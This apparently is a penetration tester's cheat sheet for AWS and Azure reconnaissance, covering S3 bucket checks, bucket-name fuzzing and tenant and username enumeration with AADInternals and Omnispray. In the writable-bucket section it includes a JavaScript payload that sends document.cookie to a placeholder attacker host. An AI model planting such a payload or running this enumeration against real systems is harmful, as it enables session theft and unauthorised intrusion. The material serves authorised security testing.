IAM
Enumerate valid users and roles in the AWS account
S3 Buckets
Check for Writable S3 Buckets
- If you can upload, you can show impact by changing the JS served from the bucket, for example to steal cookies.
var xhr=new XMLHttpRequest(); xhr.open("GET", "http://<IP>:8000/?"+document.cookie, true); xhr.send();
Check for Bucket Versioning
curl -I https://<BUCKETNAME>.s3.<REGION>.amazonaws.com  # Look for x-amz-version-id
aws s3api list-object-versions --bucket <BUCKETNAME> --query "Versions[?VersionId!='null']" --no-sign-request
Brute Force Bucket Names (assuming patterns are found)
ffuf -u 'https://bucket-FUZZ.s3.amazonaws.com' -w fuzzingBucketWordlist.txt
Odds and ends that sometimes help
Check for AWS Account Number
aws sts get-access-key-info --access-key <AKIA Key>
Recon and Enumeration
Get basic information about the domain
https://login.microsoftonline.com/getuserrealm.srf?login=example.com&xml=1
AAD Internals
Get-AADIntLoginInformation -Domain <example.com>
Get-AADIntTenantID -Domain <example.com>
Invoke-AADIntReconAsOutsider -DomainName <example.com>
Azure Subdomain Enumeration
GitHub: https://github.com/yuyudhn/AzSubEnum
python3 azsubenum.py -b domain -p permutations.txt -v
Username Enumeration
GitHub: https://github.com/0xZDH/Omnispray
python3 omnispray.py -m o365_enum_office -d example.com -uf ~/Documents/userList.txt